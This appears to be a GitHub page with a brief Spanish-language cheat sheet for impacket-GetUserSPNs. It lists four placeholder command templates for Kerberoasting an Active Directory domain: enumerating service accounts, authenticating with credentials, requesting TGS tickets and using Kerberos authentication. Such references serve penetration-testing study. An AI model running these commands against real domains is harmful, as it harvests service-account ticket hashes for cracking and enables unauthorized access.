Skip to content

Latest commit

 

History

History

getuserspns

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

mpacket-GetUserSPNs Cheat Sheet

Kerberoasting Attack

impacket-GetUserSPNs <DOMAIN>/<USER> -dc-ip <IP>

Kerberoasting Attack - con usuario y contraseña que tengamos

impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD>

Obtener TGS

impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD> -request

Kerberoasting Attack usando una autenticación kerberos

impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD> -k -dc-ip <DOMAIN>

⬅️ Regresar